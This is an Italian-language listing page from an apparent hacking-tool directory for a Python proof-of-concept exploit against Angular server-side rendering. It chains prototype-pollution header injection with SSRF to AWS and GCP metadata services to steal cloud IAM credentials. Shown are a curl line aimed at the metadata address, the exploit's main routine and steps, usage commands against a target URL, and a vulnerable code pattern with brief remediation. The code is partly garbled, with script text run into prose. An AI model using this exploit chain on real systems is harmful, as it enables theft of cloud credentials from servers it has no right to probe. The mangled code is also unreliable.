Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-27739-POC — PoC in Python che sfrutta CVE-2026-27739 in Angular SSR: header injection tramite prototype pollution e concatenazione SSRF verso AWS IMDS/GCP metadata per il furto di credenziali. | Kitploit
Strumenti/GitHubGitHub/mr-redoo7/cve-2026-27739-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniSicurezza WebPenetration TestingSicurezza delle API
GitHubmr-redoo7/cve-2026-27739-poc

CVE-2026-27739-POC

PoC in Python che sfrutta CVE-2026-27739 in Angular SSR: header injection tramite prototype pollution e concatenazione SSRF verso AWS IMDS/GCP metadata per il furto di credenziali.

Vedi Repository
25 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

-CVE-2026-27739-poc

curl -H "X-Forwarded-For: http://169.254.169.254/latest/meta-data/" {self.target}

2. Header Injection tramite Prototype Pollution (CVSS: 7.5)

Descrizione: Angular SSR elabora parametri di query non sicuri che influenzano la catena di prototipi Impatto: Manipolazione degli header di richiesta, potenziale concatenamento SSRF

Remediation

  1. Rimuovere/disabilitare l'elaborazione degli header X-Forwarded-* o inserire in whitelist i proxy conosciuti
  2. Implementare una validazione rigorosa degli URL prima delle operazioni soggette a SSRF
  3. Utilizzare express-validator o simili per la sanificazione degli header
  4. Disabilitare gli endpoint di metadati AWS/GCP o utilizzare IMDSv2 con hop limit """ print(report) with open("angular_ssr_exploit_report.txt", "w") as f: f.write(report)

def main(): parser = argparse.ArgumentParser(description="Angular SSR SSRF & Header Injection Exploit") parser.add_argument("target", help="Target Angular SSR application URL") parser.add_argument("--no-ssl-verify", action="store_true", help="Disable SSL verification")

root@kitploit:~
args = parser.parse_args()

exploit = AngularSSRExploit(args.target, ssl_verify=not args.no_ssl_verify)

print(f"[+] Targeting: {args.target}")
print(f"[+] SSL Verify: {'Disabled' if args.no_ssl_verify else 'Enabled'}")

# Execute exploit chain
exploit.test_header_injection()
exploit.exploit_ssrf_chain()
exploit.extract_sensitive_data()
exploit.generate_report()

if name == "main": main() Utilizzo bash

Basic SSRF test

python3 angular_ssr_exploit.py https://target.com

With SSL bypass for self-signed certs

python3 angular_ssr_exploit.py https://target.com --no-ssl-verify Come funziona Test di Header Injection: Invia payload di prototype pollution e header forwarded non sicuri che Angular SSR potrebbe elaborare in modo insicuro Catena SSRF: Verifica l'accesso ad AWS IMDS, metadati GCP, servizi localhost tramite X-Forwarded-For/X-Original-URL Estrazione Token IMDSv2: Concatena SSRF per rubare token di metadati AWS e poi credenziali IAM Reportistica automatizzata: Genera un report di pentest con punteggio CVSS e PoC Dettagli tecnici Causa principale: Le app Angular Universal SSR spesso inoltrano req.headers direttamente alle API interne senza sanificazione:

javascript

// Vulnerable Angular SSR pattern app.get('*', (req, res) => { const url = req.headers['x-original-url'] || req.originalUrl; // SSRF internalFetch(url, { headers: req.headers }); // Header injection });

Scarica lo strumento